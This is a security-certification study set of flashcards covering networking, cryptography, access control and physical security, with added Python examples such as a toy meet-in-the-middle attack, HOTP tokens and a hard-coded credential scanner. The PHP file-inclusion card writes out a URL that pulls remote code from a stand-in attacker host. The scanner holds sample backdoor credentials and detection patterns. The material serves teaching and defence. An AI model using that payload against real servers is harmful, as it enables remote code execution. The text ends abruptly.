Switch
A bridge with two or more ports. Best practice: connect one device per switch port. Associates the MAC address of each computer and server with its port. Shrinks the collision domain to a single port.
Memory
A series of on-off switches representing bits: 0 is off, 1 is on. Random Access Memory, Sequential Memory and Read Only Memory are all types.
Tape Rotation Methods
A common tape rotation method is called FIFO
Removable Media Controls
A common vector for malware propagation is the AutoRun feature of many recent Microsoft operating systems. Turn off Autorun functionality.
Licenses
A contract between a provider of Software and the consumer.
Remote wipe capability
Ability to erase data from a lost or stolen device remotely.
Ring Model
A form of CPU hardware layering that separates and protects domains. Ex: Intel x86, has four rings ranging from 0(kernel) to ring 3 (user). Innermost ring is most trusted. Concentric communication between rings
Clearance
A formal determination of whether or not a user can be trusted. Require interview
Hub
A half-duplex device. Like a repeater but with more than two ports (no security). Cannot send and receive simultaneously. Can provide
Caesar Cipher
A historical example of a substitution cipher.
Known Plaintext Attack
A known plaintext attack relies on recovering and analyzing a matching plaintext and ciphertext pair. Multiple ciphertexts may be encrypted with the same key.
Retina Scan
A laser scan of the capillaries that feed the retina. Retina scans are rarely used because of health risks and invasion-of-privacy issues
Lights
A light that allows a guard to see an intruder is acting as a detective control. Fresnel lenses to aim light in a specific direction. Measured in Lumens
Spring-bolt lock
A locking mechanism that "springs" in and out of the doorjamb
Process Isolation
A logical control that attempts to prevent one process from interfering with another. A common feature of multi-user operating systems. Older OSs such as MS-DOS lack process isolation, so one program (e.g., a Trojan) can read or modify another's memory.
***EXAM Warning***
A logical ring can run via a physical ring, but there are exceptions. FDDI uses both a logical and physical ring.
Hanlon's Razor
A maxim that reads "Never attribute to malice that which is adequately explained by stupidity."
Meet-in-the-Middle Attack
A meet-in-the-middle attack encrypts from one side, decrypts from the other side, and meets in the middle. Attack against double DES, which encrypts with two keys ("encrypt, encrypt"). Seeks to recover both keys with roughly 2 x 2^56 work (plus a large table) rather than the 2^112 a naive search would need.
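The attack described above, as an added example that is not part of the study set. A deliberately tiny add-rotate-xor block cipher with 16-bit keys stands in for DES so the full key space can be searched in seconds; the keys and known plaintexts are constructed for illustration.

```python
"""Meet-in-the-middle against double encryption with a toy 16-bit block cipher.

Added example, not part of the study set. The cipher here is a deliberately
tiny, insecure construction so the whole 2^16 key space can be enumerated; it
stands in for DES in the double-DES attack described in the text.
"""
MASK = 0xFFFF
ROUNDS = 4

def _rotl(x, n):
    return ((x << n) | (x >> (16 - n))) & MASK

def _rotr(x, n):
    return ((x >> n) | (x << (16 - n))) & MASK

def toy_encrypt(key: int, block: int) -> int:
    """16-bit key, 16-bit block; add-rotate-xor rounds (invertible, not secure)."""
    x = block
    for _ in range(ROUNDS):
        x = (x + key) & MASK
        x = _rotl(x, 3)
        x ^= key
    return x

def toy_decrypt(key: int, block: int) -> int:
    x = block
    for _ in range(ROUNDS):
        x ^= key
        x = _rotr(x, 3)
        x = (x - key) & MASK
    return x

def double_encrypt(k1: int, k2: int, block: int) -> int:
    return toy_encrypt(k2, toy_encrypt(k1, block))

def meet_in_the_middle(pairs) -> list:
    """Recover (k1, k2) from known plaintext/ciphertext pairs.

    Cost is 2 * 2^16 cipher operations plus a 2^16-entry table, instead of the
    2^32 operations a naive search over both keys would need.
    """
    (p0, c0), rest = pairs[0], pairs[1:]
    # Forward half: encrypt p0 under every k1 and index the intermediate value.
    table = {}
    for k1 in range(1 << 16):
        table.setdefault(toy_encrypt(k1, p0), []).append(k1)
    # Backward half: decrypt c0 under every k2 and look for a meeting point.
    found = []
    for k2 in range(1 << 16):
        mid = toy_decrypt(k2, c0)
        for k1 in table.get(mid, ()):
            # A 16-bit match can be coincidence; confirm on the remaining pairs.
            if all(double_encrypt(k1, k2, p) == c for p, c in rest):
                found.append((k1, k2))
    return found

def demo() -> list:
    k1, k2 = 0xBEEF, 0x1337                        # constructed secret keys
    plaintexts = [0x0000, 0x5A5A, 0xFFFF]           # constructed known plaintexts
    pairs = [(p, double_encrypt(k1, k2, p)) for p in plaintexts]
    return meet_in_the_middle(pairs)

if __name__ == "__main__":
    print([(hex(a), hex(b)) for a, b in demo()])
```

The forward table is the memory cost of the attack (2^56 entries for real double DES, which is why the attack is theoretical there but still drives the choice of three keys in 3DES). The extra known-plaintext pairs are needed because a single block match does not uniquely identify the key pair.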
Redundant Array of Inexpensive Disks
A method of using multiple disk drives to achieve greater data reliability, greater speed, or both
Callback
A modem-based authentication system. Callback account is created, the modem number the user will call from is entered into the account.
Advanced Encryption Standard
A modern cipher
DevOps
A more agile development and support model echoing the agile programming methods. "the practice of operations and development engineers participating together in the entire service lifecycle, from design through the development process to production support."
TACACS
A centralized access control system that requires users to send an ID and a static (reusable) password. TACACS uses UDP port 49 (and may also use TCP). Reusable passwords are a vulnerability.
Object
A passive data file
Ring Topology
A physical ring connects network nodes in a ring
Covert Channel
A policy-violating communication that is hidden from the owner or user of a data system. Unused fields within the TCP/IP headers may be used to carry covert channels.
Mantrap
A preventive physical control with two doors. Each door requires a separate form of authentication to open
ISO/IEC 24762:2008
A separate ISO plan for disaster recovery. Information technology—Security techniques—Guidelines for information and communications technology disaster recovery services.
Clark Wilson
A real world integrity model that protects integrity by requiring subjects to access objects via programs. Effectively limits the capabilities of the subject. Well formed transactions, Separation of Duties.
Packet Filter
A simple and fast firewall with no concept of state: decisions are made on the basis of a single packet. Because it cannot match replies to the requests that caused them, it must allow replies (e.g., ICMP Echo Replies, UDP DNS replies) unconditionally, which an attacker can abuse.
Counter-based synchronous dynamic tokens
A simple counter: the authentication server expects token code 1, and the user's token displays the same code 1. Once used, the token displays the second code, and the server also expects token code 2. Usually combined with a PIN (something you know).
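An added example, not part of the study set: the counter-based scheme above implemented as HOTP (RFC 4226), with a token that advances on every press and a server that keeps a small look-ahead window so a few unused presses do not lock the user out. The secret is the RFC 4226 test-vector key so the codes can be checked against the RFC; the press sequence is constructed.

```python
"""Counter-based one-time password (HOTP, RFC 4226) with a server-side
look-ahead window for resynchronisation.

Added example, not part of the study set. The shared secret is the RFC 4226
test-vector key so the generated codes can be checked against the RFC.
"""
import hashlib
import hmac
import struct

SECRET = b"12345678901234567890"     # RFC 4226 Appendix D test key

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HOTP(K, C) = dynamic-truncate(HMAC-SHA1(K, C)) mod 10^digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF) % (10 ** digits)
    return f"{code:0{digits}d}"

class HotpToken:
    """The user's device: shows a code and advances its own counter on each press."""
    def __init__(self, secret: bytes):
        self.secret = secret
        self.counter = 0

    def press(self) -> str:
        code = hotp(self.secret, self.counter)
        self.counter += 1
        return code

class HotpServer:
    """Tracks the next expected counter for one token. The look-ahead window
    tolerates codes the user generated but never submitted."""
    def __init__(self, secret: bytes, window: int = 5):
        self.secret = secret
        self.counter = 0          # next counter value the server expects
        self.window = window

    def verify(self, code: str) -> bool:
        for i in range(self.window):
            if hmac.compare_digest(hotp(self.secret, self.counter + i), code):
                # Accept and move past the used counter so the code cannot be replayed.
                self.counter += i + 1
                return True
        return False

def demo() -> dict:
    token, server = HotpToken(SECRET), HotpServer(SECRET)
    first = token.press()
    results = {"first_accepted": server.verify(first),
               "replay_rejected": not server.verify(first)}
    # The user presses the button twice without logging in, then once more.
    token.press(); token.press()
    results["resync_within_window"] = server.verify(token.press())
    # Drift beyond the window is refused, forcing an out-of-band resync.
    for _ in range(10):
        token.press()
    results["beyond_window_rejected"] = not server.verify(token.press())
    return results

if __name__ == "__main__":
    print([hotp(SECRET, c) for c in range(3)])
    print(demo())
```

The window is the usual trade-off: a larger window tolerates more accidental presses but gives an attacker more valid codes to guess against at any moment, so the server must also rate-limit failures.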
IPsec Security Association (SA)
A simplex(one-way) connection that may be used to negotiate ESP or AH parameters. Unique 32 Bit number called Security Parameter Index(SPI) identifies each simplex SA connection.
Procedure
A step-by-step guide for accomplishing a task. Like Policies, they are mandatory
Access Control Matrix
A table that defines access permissions between specific subjects and objects. A matrix is a data structure that acts as a table lookup for the operating system.
Fuzzing
A type of black box testing that submits random, malformed data as inputs into software programs to determine if they will crash
Roaming Infected Laptop
A user with an infected laptop plugs into a typical office network and requests an IP address from a DHCP server. Once given an IP, the malware installed on the laptop begins attacking other systems on the network. 802.1X/EAP port-based access control mitigates this. WLANs are susceptible as well.
Transformation Procedure (TP)
A well-formed transaction, and a constrained data item (CDI) is data that requires integrity. For each TP, an audit record is made and entered into the access control system. Provides both detective and recovery controls in case integrity is lost.
Abstraction
Abstraction hides unnecessary details from the user. Complexity is the enemy of security. The more complex a process, the less secure it is. User presses play; hears music.
Need to Know
Even a subject with sufficient clearance is granted access only to the objects needed for their job. Complements Mandatory Access Control, where access is otherwise determined by the clearance level of the subject and the classification level of the object.
2 Types of NIPS
Active Response, and Inline
ActiveX
ActiveX controls are the functional equivalent of Java applets. They use digital certificates instead of a sandbox to provide security.
8:CWR
Added in 2001: Congestion Window Reduced
9:ECE
Added in 2001: Explicit Congestion Notification Echo)
Fire Class A
A: Ordinary Combustibles -Wood -Paper -Rubber -Plastic
Asynchronous Balanced Mode
ABM initiating transmissions without receiving permission
Malware
AKA malicious code. The generic term for any type of software that attacks an application or system. Viruses, worms, Trojans, logic bombs.
Note!
All Information Security Professionals should understand Hanlon's Razor. There is plenty of malice in our world: worms, phishing attacks, identity theft, etc. But there is more brokenness and stupidity: most disasters are caused by user error. "Never attribute to malice that which is adequately explained by stupidity
Convergence
All routers on a network agree on the state of routing. A network that has experienced no recent outages is normally "converged". Closest routers know of outage first.
Application Whitelisting
Allowing binaries to run that: Are signed via a trusted code signing digital certificate. Match a known good cryptographic hash Have a trusted full path and name
Decentralized access control
Allows IT administration to occur closer to the mission and operations of the organization. An organization spans multiple locations, and the local sites support and maintain independent systems, access control databases, and data
Multitasking
Allows multiple tasks (heavy weight processes) to run simultaneously on one CPU. Older OS's are non-multitasking.
Hypervisor
Allows multiple virtual guest operating systems to run on one host.
Trusted Computer System Evaluation Criteria(TCSEC)
Also known as the Orange Book
PHP Remote File Inclusion (RFI)
Altering a normal PHP URL parameter such as http://good.example.com?file=readme.txt to include and execute remote content, such as http://good.example.com?file=http://evil.example.com/bad.php. Mitigated by disabling allow_url_include and validating the parameter against an allowlist of local files.
NIPS
Alters the flow of the traffic. Two types. Active Response and Inline
***EXAM WARNING*** Best thing to do?
Always consider hire or ask an expert as a valid choice in regards to "the best thing to do." The safest answer is often the best. The legal, ethical, and fair answer is usually the best as well.
***EXAM WARNING***
Always ensure that any forensic actions uphold integrity, and are legal and ethical.
SIGABA
American encryption device
Subject
An active entity on a data system. People accessing data files, DLL or Perl script that updates database files with new information.
Collusion
An agreement between two or more individuals to subvert the security of a system
Waterfall Model
An application development model that uses rigid phases; when one phase ends, the next begins
WLAN DoS
An attacker can pollute the wireless spectrum with noise (channel interference).
VM Escape
An attacker exploits the host OS or another guest from within a guest. IDSs and IPSs can be blinded by virtualization: a SPAN port cannot see traffic between virtual hosts on the same physical host.
Protection Profile(PP)
An independent set of security requirements and objectives for a specific category of products or systems, such as firewalls or intrusion detection systems (IDS).
Implementation Attacks
An implementation attack exploits a mistake (vulnerability) made while implementing an application
International Common Criteria
An internationally agreed upon standard for describing and testing the security of IT products. Designed to avoid requirements beyond current state of the art. Presents a hierarchy of requirements for a range of classifications and systems.
Iris Scan
An iris scan is a passive biometric control: a camera takes a picture of the iris and compares it against the photos stored in the authentication database.
Object
Any passive data within the system. Objects can range from documents on physical paper, to database tables to text files. Objects are passive; they do not manipulate other objects.
Preventive Controls
Apply restriction to what a potential user, either authorized or unauthorized, can do. Pre-employment drug screening is preventative
Tailoring Process: 2
Applying scoping considerations to the remaining baseline security controls;
Turnstiles
Designed to prevent tailgating by enforcing one-person-at-a-time authentication.
Baselines
Uniform ways of implementing a standard, e.g. "Harden the system by applying the Center for Internet Security Linux benchmarks." Discretionary: another method that meets the standard is acceptable.
ANN
Artificial Neural Network seeks to replicate the capabilities of biological neural networks.
Humidity Levels
Computers and data centers: 40-55% relative humidity, 68-77 degrees F. Sufficient airflow is key. The recent green push has widened the acceptable range for temperature and humidity.
NIST SP800-34
A specific set of requirements to review and implement a sound BCP: • Project Initiation • Scope the Project • Business Impact Analysis • Identify Preventive Controls • Recovery Strategy • Plan Design and Development • Implementation, Training, and Testing • BCP/DRP Maintenance
PCI Qualified Security Assessor (QSA)
Assesses the security of an organization that stores, processes, or transmits payment card data. A Report on Compliance (ROC) and an Attestation of Compliance (AOC) may be issued.
Tailoring Process: 4
Assigning specific values to organization-defined security control parameters via explicit assignment and selection statements
Trademarks
Associated with marketing. The purpose is to allow for the creation of a brand that distinguishes the source of products or services.
Wireless Security
A concern with shared tenancy: other tenants in the same building are within range of your wireless network, so wireless attacks raise concerns.
3 A's of Access Control
Authentication, Authorization, and Accountability
Penetration Testing
Authorized attempt to break into an organization's physical or electronic perimeter (and sometimes both)
Routing Protocols
Automatically learn a network topology and determine the best routes between all network points. Employ backup routes in case of a router outage.
Security Awareness and Training
Awareness changes user behavior. Training provides a skill set.
Kerberos 4
Any user may request a session key for another user. Kerberos does not mitigate a malicious local host: plaintext keys may exist in memory or cache.
Fire Class B
B: Flammable liquids: liquids, greases, gases.
ISO/IEC-27031
BCP guidelines. 1. Provide a framework (methods and processes) for any organization. 2. Identify and specify all relevant aspects. 3. Enable an organization to measure its continuity and security. 4. ICT: Information and Communications Technology. 5. ISMS: Information Security Management System.
EGP
Exterior Gateway Protocol, used to route between autonomous systems. Example: BGP.
CWE: Hard-coded credentials
Backdoor username/passwords left by programmers in production code
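A minimal scanner for the pattern this card describes, added here as an illustration and not part of the study set. It runs two regular expressions (a password-like name assigned a string literal, and credentials embedded in a URL) over a constructed source snippet that contains a left-behind backdoor; real secret scanners use much larger rule sets and entropy checks, but the shape of the check is the same.

```python
"""Added example: a minimal scanner for hard-coded credentials.

Illustrative Python written for this study set, not code from the set.
The regexes cover a few common patterns only; SAMPLE_SOURCE is constructed.
"""
import re

PATTERNS = {
    # name like password/pass/pwd/secret/api_key/token assigned a literal
    "password-literal": re.compile(
        r"""(?i)\b(?:pass(?:word|wd)?|secret|api[_-]?key|token)\s*[:=]{1,2}\s*["'][^"']{4,}["']"""),
    # scheme://user:password@host  (credentials in a connection string)
    "basic-auth-url": re.compile(r"""[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@""", re.I),
}

# constructed source lines, including a backdoor a developer forgot to remove
SAMPLE_SOURCE = """\
db_user = os.environ.get("DB_USER")
db_pass = os.environ.get("DB_PASS")
if user == "support" and password == "letmein123":  # TODO remove before release
    return True
API_KEY = 'AKIA-constructed-example'
conn = connect("mysql://root:hunter2@db.internal/prod")
"""


def scan(source: str):
    """Return a list of (line_no, rule_name, matched_text) findings."""
    findings = []
    for no, line in enumerate(source.splitlines(), start=1):
        for rule, rx in PATTERNS.items():
            m = rx.search(line)
            if m:
                findings.append((no, rule, m.group(0)))
    return findings


if __name__ == "__main__":
    for no, rule, text in scan(SAMPLE_SOURCE):
        print(f"line {no}: {rule}: {text}")
```

Lines 1 and 2 read credentials from the environment and produce no finding; lines 3, 5 and 6 are flagged.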
BIOS
Basic Input Output System(BIOS) Firmware is stored in ROM. While ROM is read-only, some types of ROM can be written to via flashing.
Star topology
Has become the dominant physical topology for LANs.
Block Cipher
Block mode(ciphers) encrypt blocks of data each round.
BOOTP
Bootstrap Protocol, used (in conjunction with TFTP for the download) for bootstrapping diskless systems via the network. Many BIOSs now support BOOTP.
BGP
Border Gateway Protocol, the routing protocol used on the Internet. Has distance vector properties but is formally considered a path vector routing protocol.
CPU
Brains of the computer. Capable of performing complex mathematical calculations. Rated by number of clock cycles per second. 2.4 GHz has 2.4 Billion clock cycles per second.
ISO 17799
Broad based approach for Information Security code of practice. Full title ISO/IEC 17799:2005. Code of Practice for Information Security Management.
Electronic Communications Privacy Act(ECPA)
Brought search and seizure protection to non-telephony electronic communications. Protect from warrantless wiretapping. PATRIOT Act weakened some of the ECPA restrictions.
Senior Management
Business owners and mission owners. Responsible for ensuring all organizational assets are protected.
Primary Information Security Roles
Business Owners, Mission Owners, Data Owners, System Owners, Custodians, and Users.
Fuji-Xerox
Business scholars and practitioners were asking such questions as "What are the key factors in the Japanese manufacturers' remarkable successes?"
Trade Secrets
Business-proprietary information that is important to an organization's ability to compete; business information that provides a competitive edge. Due care and due diligence must be exercised to protect it.
Biba Model
Integrity model: businesses want the integrity of their information protected at the highest level. Has two primary rules, the Simple Integrity Axiom (no read down) and the * (Star) Integrity Axiom (no write up). Reverses the Bell-LaPadula rules.
Fire Class C
C: Electrical Equipment
CIA Write Up Concept
The CIA operates intelligence collection using the write-up concept: the sensitivity of the final object will be much higher than the clearance of any individual agent who contributed to it.
3rd Gen Language
COBOL, C, Basic
COOP
Continuity of Operations Plan. Sustains an organization's essential, strategic functions at an alternate site for up to 30 days.
Random Access Memory(RAM)
The CPU may randomly access (jump to) any location in memory. Volatile, but not as volatile as once believed: contents can persist briefly after power loss.
CTR
CTR is counter mode. It encrypts an incrementing counter to produce a keystream and shares the advantages of OFB (patterns are destroyed and errors do not propagate); unlike OFB it can be parallelized. **STREAM**
Cable modems
Used by cable TV providers to offer Internet access via the broadband cable TV plant. Unlike DSL, cable modem bandwidth is typically shared with neighbors on the same network segment.
Tree Topology
Called hierarchical network: a network with a root node, and branch nodes that are at least three levels deep.
Dust
Can cause static buildup and overheating
Vendor, Consultant, and Contractor Security
Can introduce risks to an organization. Third party personnel with access to sensitive data must be trained properly
CSMA/CD
Carrier Sense Multiple Access with Collision Detection used to immediately detect collisions within a network
CSMA
Carrier Sense Multiple Access: Shared usage on Ethernet. Avoid collisions
Embedded Device Forensics
Cell phones, GPS receiver and PDA (Personal Digital Assistant) devices are so common that they have become standard in today's digital examinations. Common carriers of Malware.
CHAP
Challenge Handshake Authentication Protocol. A central authenticator challenges remote users. As stated in the RFC, "CHAP depends upon a 'secret' known only to the authenticator and the peer." A sniffer that views the entire challenge/response exchange will not be able to determine the shared secret.
Asynchronous dynamic tokens
Challenge-response tokens. The authentication system produces a challenge (input for the token device); the user enters it into the token, often along with a PIN, and the token computes the response.
Dynamic passwords
Change at regular intervals. RSA Security makes a synchronous token device called SecurID that generates a new token code every 60 seconds
Layered Design
Changing your physical network connection from wired to wireless (At Layer 1) has no effect on your Web Browser(at Layer 7)
Contraband Checks
Checks that identify prohibited objects. Port blocking (e.g. disabling USB ports) used in conjunction with contraband checks is part of defense in depth.
TPM
Chip on the system motherboard that stores keys and boot measurements to verify authenticity. Ensures boot integrity, protects against kernel-mode rootkits, and supports full disk encryption (e.g. by holding the disk key).
CBC
Cipher Block Chaining: a block mode that XORs the previous ciphertext block into the next block of plaintext before encrypting it. The first block is XORed with an IV. Errors propagate: a corrupted ciphertext block garbles that whole block on decryption and flips the corresponding bits of the next. **BLOCK**
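The CTR and CBC cards above state opposite error-propagation behaviour; the following added example (illustrative Python, not code from the study set) makes it concrete. It implements both modes over a toy 8-byte Feistel block cipher keyed through SHA-256, which stands in for DES/AES so the code runs offline and is not secure. It then flips one ciphertext bit and counts how many plaintext bytes are corrupted on decryption. Key, IV/nonce and message are constructed.

```python
"""Added example: error propagation in CBC versus CTR mode.

Illustrative Python written for this study set, not code from the set.
The block cipher is a toy four-round Feistel network (NOT secure); the
modes of operation around it are the real constructions.
"""
import hashlib

BLOCK = 8            # 64-bit blocks, like DES
HALF = BLOCK // 2


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round_fn(half: bytes, key: bytes, rnd: int) -> bytes:
    # Keyed pseudo-random function for one Feistel round (toy, not DES's F)
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:HALF]


def block_encrypt(block: bytes, key: bytes) -> bytes:
    """Toy Feistel block cipher; invertible, so CBC decryption works."""
    left, right = block[:HALF], block[HALF:]
    for rnd in range(4):
        left, right = right, _xor(left, _round_fn(right, key, rnd))
    return right + left


def block_decrypt(block: bytes, key: bytes) -> bytes:
    right, left = block[:HALF], block[HALF:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round_fn(left, key, rnd)), left
    return left + right


def cbc_encrypt(pt: bytes, key: bytes, iv: bytes) -> bytes:
    """CBC: XOR the previous ciphertext block (IV for the first) into the plaintext."""
    assert len(pt) % BLOCK == 0, "example assumes input is already padded"
    prev, out = iv, b""
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(_xor(pt[i:i + BLOCK], prev), key)
        out += prev
    return out


def cbc_decrypt(ct: bytes, key: bytes, iv: bytes) -> bytes:
    prev, out = iv, b""
    for i in range(0, len(ct), BLOCK):
        cur = ct[i:i + BLOCK]
        out += _xor(block_decrypt(cur, key), prev)
        prev = cur
    return out


def ctr_crypt(data: bytes, key: bytes, nonce: bytes) -> bytes:
    """CTR: encrypt nonce||counter to get a keystream; the same call encrypts and decrypts."""
    out = b""
    for i in range(0, len(data), BLOCK):
        counter_block = nonce[:HALF] + (i // BLOCK).to_bytes(HALF, "big")
        keystream = block_encrypt(counter_block, key)
        chunk = data[i:i + BLOCK]
        out += _xor(chunk, keystream[:len(chunk)])
    return out


KEY = b"constructed-key!"     # constructed key
IV = b"\x01" * BLOCK          # constructed IV / nonce
PT = b"ATTACK AT DAWN!!" * 2  # 32 bytes = 4 blocks, constructed message


def roundtrip_ok() -> bool:
    return (cbc_decrypt(cbc_encrypt(PT, KEY, IV), KEY, IV) == PT
            and ctr_crypt(ctr_crypt(PT, KEY, IV), KEY, IV) == PT)


def corrupted_bytes(mode: str) -> int:
    """Flip one bit of the first ciphertext byte; count plaintext bytes that change."""
    ct = cbc_encrypt(PT, KEY, IV) if mode == "cbc" else ctr_crypt(PT, KEY, IV)
    damaged = bytearray(ct)
    damaged[0] ^= 0x01
    rec = (cbc_decrypt(bytes(damaged), KEY, IV) if mode == "cbc"
           else ctr_crypt(bytes(damaged), KEY, IV))
    return sum(a != b for a, b in zip(PT, rec))


if __name__ == "__main__":
    print("round trip:", roundtrip_ok())
    print("CBC bytes corrupted:", corrupted_bytes("cbc"))  # block 0 garbled + 1 byte of block 1
    print("CTR bytes corrupted:", corrupted_bytes("ctr"))  # only the flipped byte
```

In CBC the damaged block decrypts to garbage and the flipped bit reappears in the next block (the card's "errors propagate"), while in CTR only the single flipped byte is affected. The same property is why an unauthenticated CTR or OFB ciphertext can be bit-flipped at will: these modes need a MAC alongside them.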
Running Key Cipher
Cipher that uses modular math: each plaintext letter is shifted by the corresponding letter of a long key text (such as a passage from a book), mod 26.
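The modular arithmetic the card refers to, worked through in an added Python example (not part of the study set). The key text below stands in for the agreed book passage; plaintext and key are constructed.

```python
"""Added example: a running key cipher with modular arithmetic.

Illustrative Python written for this study set, not code from the set.
Letters are mapped A=0..Z=25; encryption adds the key letter mod 26 and
decryption subtracts it. Non-letters are dropped, as in classical practice.
"""
import string

ALPHABET = string.ascii_uppercase


def _letters(text: str) -> str:
    return "".join(ch for ch in text.upper() if ch in ALPHABET)


def running_key_encrypt(plaintext: str, key_text: str) -> str:
    """Shift each plaintext letter by the matching key-text letter, mod 26."""
    p, k = _letters(plaintext), _letters(key_text)
    if len(k) < len(p):
        raise ValueError("key text must be at least as long as the plaintext")
    return "".join(ALPHABET[(ALPHABET.index(a) + ALPHABET.index(b)) % 26]
                   for a, b in zip(p, k))


def running_key_decrypt(ciphertext: str, key_text: str) -> str:
    """Subtract the key letter mod 26 to recover the plaintext letters."""
    k = _letters(key_text)
    return "".join(ALPHABET[(ALPHABET.index(c) - ALPHABET.index(b)) % 26]
                   for c, b in zip(ciphertext, k))


if __name__ == "__main__":
    key = "It was the best of times, it was the worst of times"  # constructed key text
    ct = running_key_encrypt("ATTACK AT DAWN", key)
    print(ct, running_key_decrypt(ct, key))
```

Because the key is natural-language text rather than random, letter frequencies leak through; that is why a running key cipher is weaker than a true one-time pad even though the arithmetic is identical.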
4th Gen Language
ColdFusion, Progress 4GL, Oracle Reports
Credential Set
Combination of both the identification and authentication of a user.
Network Access Layer
Combines Layer 1 (Physical) and Layer 2 (Data Link) of the OSI model.
Application Layer
Combines Layers 5 through 7 (Session, Presentation, and Application) of the OSI model
COTS Software
Commercial Off-the-Shelf
Secondary Evidence
Common in cases involving computers. Consists of copies of original documents and oral descriptions, e.g. logs.
Sharia Law
Common religious law for Islam. It uses the Qur'an and Hadith as its foundation.
Port Isolation
Commonly employed with the increasing density of virtualized systems in datacenters. Severely limits lateral movement. Generally cumbersome if not done virtually.
Mirroring
Complete duplication of data to another disk, used by some levels of RAID.
CISC
Complex Instruction Set Computer. Uses large set of complex machine language instructions.
COM
Component Object Model locates objects on a local system
IAB Practice 5
Compromises the privacy of users.
Source code
Computer programming language instructions that are written in text that must be translated into machine code before execution by the CPU
Computer Systems as a Target
Computer system serves as primary target. DDoS, Installing Malware for Spam, Exploiting Vulnerabilities
Bots
A computer system running malware that is controlled as part of a botnet. Used to steal information, launch DoS attacks, and send spam.
System Unit
Computer's case. Contains all of the internal electronic components. Motherboard, disk drives, power supply.
CASE
Computer-Aided Software Engineering uses programs to assist in the creation and maintenance of other computer programs. Three types: tools, workbenches, and environments. 4th generation languages often use CASE.
Title 18 U.S.C. Section 242
Deprivation of Rights Under Color of Law
Operations Security
Concerns systems and data. About people, data, media, and hardware; all of which are elements that need to be considered from a security perspective
NIST SDLC Step 3
Conduct a Sensitivity Assessment: Look at the security sensitivity of the system and the information to be processed.
OCTAVE Phase 3
Conducts the Risk Analysis. Develops Risk Mitigation Strategy.
True Positive Example
Conficker worm is spreading on a trusted network, and NIDS alerts
False Negative
Conficker worm is spreading on a trusted network, and NIDS is silent
Object(Labels)
Confidential, Secret, Top Secret. EO 12356
CIA
Confidentiality, Integrity, Availability
CCB
Configuration Control Board - Establishment of and charter for a group of qualified people with responsibility for the process of controlling and approving changes throughout the development and operational lifecycle of products and systems
Real Evidence
Consists of tangible or physical objects. USB Storage, DVDs, Hard Drives, Printed Business Records.
Basic Input Output System(BIOS)
Contains code in firmware that is executed when a PC is powered on. It first runs the Power-On Self-Test (POST).
Motherboard
Contains hardware. Firmware, Memory slots, CPU, etc.
CDN
Content Delivery Networks, e.g. Akamai, Amazon CloudFront, CloudFlare. CDNs also increase availability and can reduce the effects of denial-of-service attacks. Latency is typically in the 75-140 ms range, but it can be significantly higher, especially for mobile users accessing a site over a 3G network.
NIST SP 800-34
Contingency Planning Guide for Federal Information Systems
COBIT
Control Objectives for Information and related Technology is a control framework for employing information security governance best practices within an organization. Provides IT Governance Model.
***EXAM WARNING***
For control types on the exam, do not memorize examples; instead look at the context. A firewall is a good example of a preventive control. A lock is a good example of a preventive physical control.
COCOM
Coordinating Committee for Multilateral Export Controls. In effect from 1947 to 1994. Charter COCOM members included Japan, Australia, Turkey, and much of the rest of the non-Soviet-controlled world.
Single Loss Expectancy (SLE)
Cost of One Loss
Common SQL Commands
Create, Select, Delete, Insert, Update
Spiral Model
Created by Barry W. Boehm. The model creates a risk-driven approach to the software process rather than a primarily document-driven or code-driven process
The TCP/IP Model
Created by DARPA in the 1970s. The formal name is the Internet Protocol Suite.
Wassenaar Arrangement
Created in 1996, relaxed many restrictions on exporting cryptography.
CER
Crossover Error Rate describes the point where the False Reject Rate (FRR) and False Accept Rate (FAR) are equal.
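How FAR, FRR and the crossover are actually computed from match scores, as an added Python example that is not part of the study set. The genuine and impostor scores are constructed (higher means the sample looks more like the enrolled template); the threshold sweep is the general method.

```python
"""Added example: computing FAR, FRR and the crossover error rate (CER).

Illustrative Python written for this study set, not code from the set.
GENUINE and IMPOSTOR are constructed match scores in the range 0..1.
"""
# constructed scores: authorized users (genuine) and attackers (impostors)
GENUINE = [0.92, 0.88, 0.81, 0.77, 0.74, 0.69, 0.66, 0.58, 0.52, 0.45]
IMPOSTOR = [0.60, 0.55, 0.49, 0.41, 0.38, 0.33, 0.29, 0.21, 0.14, 0.08]


def far(threshold: float, impostor=IMPOSTOR) -> float:
    """False Accept Rate (Type II): impostors scoring at or above the threshold."""
    return sum(s >= threshold for s in impostor) / len(impostor)


def frr(threshold: float, genuine=GENUINE) -> float:
    """False Reject Rate (Type I): authorized users scoring below the threshold."""
    return sum(s < threshold for s in genuine) / len(genuine)


def crossover(genuine=GENUINE, impostor=IMPOSTOR):
    """Sweep every observed score as a threshold; return (threshold, rate) at the CER.

    With discrete data FAR and FRR may never be exactly equal, so choose the
    threshold minimising |FAR - FRR| (lowest threshold on ties) and report
    the mean of the two rates as the CER.
    """
    candidates = sorted(set(genuine) | set(impostor))
    best = min(candidates,
               key=lambda t: (abs(far(t, impostor) - frr(t, genuine)), t))
    return best, (far(best, impostor) + frr(best, genuine)) / 2


if __name__ == "__main__":
    for t in (0.45, 0.55, 0.70):
        print(f"threshold {t:.2f}: FAR={far(t):.1f} FRR={frr(t):.1f}")
    print("CER at threshold, rate:", crossover())
```

Raising the threshold lowers FAR and raises FRR; the CER is the single-number summary used to compare biometric systems, and a deployment that cares more about keeping impostors out will run above it.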
CIRP
Cyber Incident Response Plan is designed to respond to disruptive cyber events, including network-based attacks, worms, computer viruses, Trojan horses, etc.
Fire Class D
D: Combustible metals: magnesium, zinc, calcium, titanium, lithium.
Discretionary Access Control
DAC gives subjects full control of objects they have created or been given access to, including sharing the objects with other subjects
Data Query Languages
DDL(Data Definition Language) DML(Data Manipulation Language)
Direct Sequence Spread Spectrum
DSSS uses the entire band at once, "spreading" the signal throughout the band
DCE
Data Circuit-Terminating Equipment. A device that networks DTEs, such as a router or CSU/DSU. The DCE marks the end of the ISP's network; the DTE is the customer's responsibility.
DES
